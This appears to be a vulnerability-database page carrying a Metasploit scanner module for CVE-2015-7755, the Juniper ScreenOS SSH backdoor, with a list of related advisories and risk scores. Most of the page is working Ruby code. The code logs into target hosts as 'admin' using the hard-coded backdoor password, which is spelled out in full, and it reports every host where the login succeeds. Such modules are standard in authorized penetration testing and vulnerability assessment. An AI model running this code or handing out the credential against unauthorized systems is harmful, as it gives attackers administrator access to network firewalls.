Juniper SSH Backdoor Scanner

🗓️ 01 Sep 2024 00:00:00Reported by H D Moore, h00die, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 271 Views

Module scans for Juniper SSH backdoor, requires any username and specific password, provides debugging, and references CVE-2015-7755

Reporter	Title	Published	Views	Family All 32
GithubExploit	Exploit for Improper Authentication in Juniper Screenos	9 Jan 201622:49	–	githubexploit
ATTACKERKB	CVE-2015-7755	19 Dec 201500:00	–	attackerkb
BDU FSTEC	The vulnerability of the ScreenOS operating system, related to deficiencies in authentication procedures, allows a perpetrator to connect to the device with administrator privileges.	28 Dec 201500:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the ScreenOS operating system allows a hacker to decode messages.	28 Dec 201500:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the ScreenOS operating system allows a hacker to decode messages.	29 Dec 201500:00	–	bdu_fstec
Circl	CVE-2015-7755	21 Dec 201511:58	–	circl
CISA KEV Catalog	Juniper ScreenOS Improper Authentication Vulnerability	2 Oct 202500:00	–	cisa_kev
CISA	CISA Adds Five Known Exploited Vulnerabilities to Catalog	2 Oct 202512:00	–	cisa
CNVD	Backdoor Vulnerability in Juniper Networks ScreenOS (CNVD-2015-08307)	21 Dec 201500:00	–	cnvd
Check Point Advisories	Juniper Networks ScreenOS Authentication Bypass (CVE-2015-7755)	21 Dec 201500:00	–	checkpoint_advisories

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'net/ssh'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::SSH  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Juniper SSH Backdoor Scanner',  
'Description' => %q{  
This module scans for the Juniper SSH backdoor (also valid on Telnet).  
Any username is required, and the password is <<< %s(un='%s') = %u.  
},  
'Author' => [  
'hdm', # Discovery  
'h00die <mike[at]stcyrsecurity.com>' # Module  
],  
'References' => [  
['CVE', '2015-7755'],  
['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],  
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']  
],  
'DisclosureDate' => '2015-12-20',  
'License' => MSF_LICENSE  
))  
  
register_options([  
Opt::RPORT(22)  
])  
  
register_advanced_options([  
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),  
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])  
])  
end  
  
def run_host(ip)  
ssh_opts = ssh_client_defaults.merge({  
:port => rport,  
:auth_methods => ['password', 'keyboard-interactive'],  
:password => %q{<<< %s(un='%s') = %u},  
})  
  
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']  
  
begin  
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do  
Net::SSH.start(  
ip,  
'admin',  
ssh_opts  
)  
end  
rescue Net::SSH::Exception => e  
vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")  
return  
end  
  
if ssh  
print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")  
report_vuln(  
:host => ip,  
:name => self.name,  
:refs => self.references,  
:info => ssh.transport.server_version.version  
)  
end  
end  
  
def rport  
datastore['RPORT']  
end  
end  
`

01 Sep 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 210

EPSS0.614